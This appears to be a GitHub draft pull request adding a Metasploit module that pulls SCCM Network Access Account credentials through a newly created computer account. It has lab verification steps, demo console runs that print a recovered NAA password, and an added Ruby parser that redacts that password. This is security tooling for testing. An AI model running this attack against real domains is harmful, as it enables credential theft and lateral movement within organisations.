
NAA creds from SCCM #19712

Draft pull request: wants to merge 16 commits into master

Conversation

smashery (Contributor)

This implements retrieval of NAA creds from an SCCM server. Given a computer name and password (which can typically be created by a standard AD domain user), a misconfigured system will just give out

Depends on rapid7/rex-mime#5 and lemontree55/rasn1#40

The main limitation of this work to date is that I've only been able to test on one SCCM server. I'm aware that different crypto schemes are in use, so for now I've given clear error messages in those cases.

Verification

I set up a test environment using GOAD.

  • Start msfconsole
  • Create a new computer account using the samr_computer (soon samr_account) module.
  • use auxiliary/admin/sccm/get_naa_creds
  • Run the module with the rhost set to the Domain Controller, with valid domain creds (low priv should be fine), and the computer creds you just obtained.
  • Verify that it successfully gets NAA creds
  • Run it again, setting MANAGEMENT_POINT and SITE_CODE to the values that the module found on the first run (and no rhost)
  • Verify that it successfully gets NAA creds without connecting to LDAP for autodiscovery

Demo

Autodiscovery:

msf6 auxiliary(admin/sccm/get_naa_creds) > run rhost=192.168.33.10 username=eve domain=sccm.lab password=iloveyou computer_user=DESKTOP-BXGIS9UE$ computer_pass=lkUEdeMQinNvgJ7mPV2787Cnf7lhQQio
[*] Running module against 192.168.33.10

[*] Discovering base DN automatically
[*] 192.168.33.10:389 Discovered base DN: DC=sccm,DC=lab
[+] Found Management Point: MECM.sccm.lab (Site code: P01)
[*] Got SMS ID: 2088712A-B957-43F1-B62E-E516A050D6F7
[*] Waiting 5 seconds for SCCM DB to update...
[*] Got NAA Policy URL: http://<mp>/SMS_MP/.sms_pol?{c48754cc-090c-4c56-ba3d-532b5ce5e8a5}.2_00
[+] Found valid NAA creds: sccm.lab\sccm-naa:123456789
[*] Auxiliary module execution completed

Explicit Management Point/Site Code:

msf6 auxiliary(admin/sccm/get_naa_creds) > run management_point=MECM.sccm.lab computer_user=DESKTOP-BXGIS9UE$ computer_pass=lkUEdeMQinNvgJ7mPV2787Cnf7lhQQio site_code=P01

[*] Got SMS ID: 2088712A-B957-43F1-B62E-E516A050D6F7
[*] Waiting 5 seconds for SCCM DB to update...
[*] Got NAA Policy URL: http://<mp>/SMS_MP/.sms_pol?{c48754cc-090c-4c56-ba3d-532b5ce5e8a5}.2_00
[+] Found valid NAA creds: sccm.lab\sccm-naa:123456789
[*] Auxiliary module execution completed
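As an added example (not code from this PR or from Metasploit itself), the Ruby below takes console output in the format shown in the demo runs and turns it into a structured finding: management point, site code, SMS ID, policy URL and the NAA account name. It also redacts the recovered NAA password from the stored lines, which is what you want before the output goes into a report or ticket, and it distinguishes a run that found the management point via LDAP autodiscovery from one given MANAGEMENT_POINT and SITE_CODE explicitly (no "Found Management Point" line). The patterns assume the exact line formats shown above; the sample output embedded in the block is constructed in that shape, not a live capture.

```ruby
# Added example, not part of this PR or of the Metasploit framework.
# Parses get_naa_creds console output into a finding and redacts the NAA
# password. Line formats are assumed to match the PR demo output.

# Constructed sample in the shape of the autodiscovery demo run.
SAMPLE_OUTPUT = <<~'OUT'
  [*] Running module against 192.168.33.10
  [*] Discovering base DN automatically
  [*] 192.168.33.10:389 Discovered base DN: DC=sccm,DC=lab
  [+] Found Management Point: MECM.sccm.lab (Site code: P01)
  [*] Got SMS ID: 2088712A-B957-43F1-B62E-E516A050D6F7
  [*] Waiting 5 seconds for SCCM DB to update...
  [*] Got NAA Policy URL: http://<mp>/SMS_MP/.sms_pol?{c48754cc-090c-4c56-ba3d-532b5ce5e8a5}.2_00
  [+] Found valid NAA creds: sccm.lab\sccm-naa:123456789
  [*] Auxiliary module execution completed
OUT

# One pattern per module output line we care about (assumed formats).
NAA_PATTERNS = {
  management_point: /\A\[\+\] Found Management Point: (?<host>\S+) \(Site code: (?<site>\w+)\)/,
  sms_id:           /\A\[\*\] Got SMS ID: (?<id>[0-9A-Fa-f-]{36})/,
  policy_url:       /\A\[\*\] Got NAA Policy URL: (?<url>\S+)/,
  naa_creds:        /\A\[\+\] Found valid NAA creds: (?<domain>[^\\\s]+)\\(?<user>[^:\s]+):(?<password>.*)\z/
}.freeze

# Walk the output line by line, fill in the finding, and keep a copy of the
# lines with the NAA password replaced by a placeholder.
def parse_naa_output(text)
  finding = {
    management_point: nil, site_code: nil, sms_id: nil, policy_url: nil,
    naa_domain: nil, naa_user: nil, naa_password_present: false,
    redacted_lines: []
  }
  text.each_line do |raw|
    line = raw.chomp
    if (m = NAA_PATTERNS[:management_point].match(line))
      finding[:management_point] = m[:host]
      finding[:site_code] = m[:site]
    elsif (m = NAA_PATTERNS[:sms_id].match(line))
      finding[:sms_id] = m[:id]
    elsif (m = NAA_PATTERNS[:policy_url].match(line))
      finding[:policy_url] = m[:url]
    elsif (m = NAA_PATTERNS[:naa_creds].match(line))
      finding[:naa_domain] = m[:domain]
      finding[:naa_user] = m[:user]
      finding[:naa_password_present] = !m[:password].empty?
      # Keep everything up to the password and drop the secret itself.
      line = line[0...m.begin(:password)] + '<redacted>' if finding[:naa_password_present]
    end
    finding[:redacted_lines] << line
  end
  finding
end

# Classify the run: no credentials, credentials after LDAP autodiscovery of the
# management point, or credentials with the management point supplied explicitly.
def naa_run_outcome(finding)
  return :no_creds unless finding[:naa_user]

  finding[:management_point] ? :creds_via_autodiscovery : :creds_via_explicit_mp
end

if __FILE__ == $PROGRAM_NAME
  result = parse_naa_output(SAMPLE_OUTPUT)
  puts "Outcome: #{naa_run_outcome(result)}"
  puts "MP: #{result[:management_point]} site: #{result[:site_code]} NAA user: #{result[:naa_domain]}\\#{result[:naa_user]}"
  puts result[:redacted_lines]
end
```

Feed it the saved console output of a run (for example via `File.read`) and store `redacted_lines` rather than the raw transcript; `naa_password_present` records that a cleartext NAA password was returned without keeping the value.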

@smashery smashery changed the title Naa creds NAA creds from SCCM Dec 10, 2024
@smashery (Contributor, Author)

Once accepted, we should neaten up some of the duplicate structures in the PKINIT code (which are also CMS). I've kept that task separate for now.
